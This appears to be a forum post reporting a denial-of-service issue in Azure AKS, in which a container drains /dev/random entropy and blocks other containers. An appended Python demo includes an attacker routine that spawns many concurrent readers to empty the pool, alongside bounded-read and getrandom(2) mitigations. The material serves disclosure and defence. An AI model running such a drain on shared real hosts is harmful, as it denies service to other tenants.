A Docker security issue: using /dev/random to mount a DoS attack in the Azure AKS environment

5/3/2021

We found a Docker security issue: a container can exhaust all the entropy of /dev/random in the Linux kernel, causing a DoS attack in the Azure AKS environment.

Reproduction steps:

1. Follow the AKS tutorial to set up an AKS cluster. We use one virtual machine with 8 GB of memory, a 120 GB SSD disk, the linux 5.4.0-1043-azure OS, Kubernetes version v1.18.14 and Docker version 19.3.14 to set up the Azure Kubernetes cluster. All of these settings are done through the Azure Kubernetes UI.
2. Deploy the unprivileged malicious Docker container with UID 1000, all capabilities dropped, a 2 GB memory limit, pinned to a dedicated core, and privilege escalation disabled. We run the malicious container in a separate Kubernetes namespace.
3. In the malicious container, start 100 processes that read random data from /dev/random. As a result, the entropy of /dev/random is exhausted; read requests from the victim container always block, and it cannot get any random data from /dev/random.

Is there any way to defend against this attack inside the Azure AKS environment? Looking forward to your reply!
-- Nanzi Yang
azure
docker
kubernetes
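As an added example (not part of the question above and not Azure or Kubernetes project code), the script below exercises the mechanism the post describes on a single Linux node. The attacker half spawns concurrent readers that keep the legacy blocking pool behind /dev/random empty; the victim half shows two reads that are not held hostage by that pool: a /dev/random read bounded by a deadline, and getrandom(2), which waits only for the CRNG to be seeded once at boot and ignores the entropy_avail counter afterwards. It assumes the standard Linux paths /dev/random and /proc/sys/kernel/random/entropy_avail, which are node-wide and readable from an unprivileged container; the worker counts and timeouts are arbitrary values chosen for the demo. Caveat: the blocking pool exists on the 5.4 kernel named in the post, but Linux 5.6 and later make /dev/random behave like getrandom(2) once seeded, so on those kernels the drain has no effect on other readers.

```python
"""
Probe and exercise the legacy blocking pool behind /dev/random.

Constructed demo: the attacker side hammers /dev/random from many workers
(the post used 100 processes), the victim side shows a bounded /dev/random
read and a getrandom(2) read, neither of which can hang forever.
Paths are the standard Linux ones; nothing here is Azure-specific.
"""
import os
import select
import threading
import time

# Host-wide entropy estimate; readable from any container, no capabilities needed.
ENTROPY_AVAIL = "/proc/sys/kernel/random/entropy_avail"


def entropy_avail(path=ENTROPY_AVAIL):
    """Return the kernel's current entropy estimate in bits, or None if unavailable."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def read_random_bounded(nbytes, timeout_s, path="/dev/random"):
    """Victim-side read that never hangs: O_NONBLOCK plus select() with a deadline.

    Returns whatever bytes were obtained before the deadline (possibly fewer than nbytes).
    """
    fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK)
    try:
        buf = bytearray()
        deadline = time.monotonic() + timeout_s
        while len(buf) < nbytes:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                break
            ready, _, _ = select.select([fd], [], [], remaining)
            if not ready:
                break                      # deadline hit while the pool was still empty
            try:
                chunk = os.read(fd, nbytes - len(buf))
            except BlockingIOError:
                continue                   # another reader drained the pool first; wait again
            if not chunk:
                break
            buf += chunk
        return bytes(buf)
    finally:
        os.close(fd)


def read_getrandom(nbytes):
    """Victim-side read that does not depend on entropy_avail at all.

    getrandom(2) with flags=0 blocks only until the CRNG has been seeded at boot;
    after that it never blocks, however many /dev/random readers share the node.
    """
    if hasattr(os, "getrandom"):
        return os.getrandom(nbytes, 0)
    return os.urandom(nbytes)              # non-Linux fallback; never blocks either


def drain_random(workers, duration_s, chunk=512, path="/dev/random"):
    """Attacker side: many concurrent readers pulling from the blocking pool.

    Threads suffice because every read hits the same kernel pool. Reads are
    non-blocking so the demo itself always terminates after duration_s.
    """
    counts = [0] * workers
    stop_at = time.monotonic() + duration_s

    def worker(i):
        fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK)
        try:
            while time.monotonic() < stop_at:
                try:
                    counts[i] += len(os.read(fd, chunk))
                except BlockingIOError:
                    time.sleep(0.001)      # pool empty: keep polling so it never refills
        finally:
            os.close(fd)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return {"workers": workers, "bytes_read": sum(counts), "entropy_avail_after": entropy_avail()}


if __name__ == "__main__":
    print("entropy_avail before:", entropy_avail())
    print("attacker:", drain_random(workers=8, duration_s=2.0))
    t0 = time.monotonic()
    got = read_random_bounded(32, timeout_s=1.0)
    print(f"victim /dev/random: {len(got)} of 32 bytes in {time.monotonic() - t0:.2f}s")
    print("victim getrandom(2):", len(read_getrandom(32)), "bytes, returned immediately")
```

Run it as root or as an unprivileged user; no capability is involved, which is the point of the report. On a pre-5.6 kernel the bounded /dev/random read typically returns short while the drain is running, and entropy_avail_after sits near zero, whereas read_getrandom returns immediately. A victim workload that calls getrandom(2) or reads /dev/urandom instead of /dev/random is therefore not affected by this particular starvation.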

0 Answers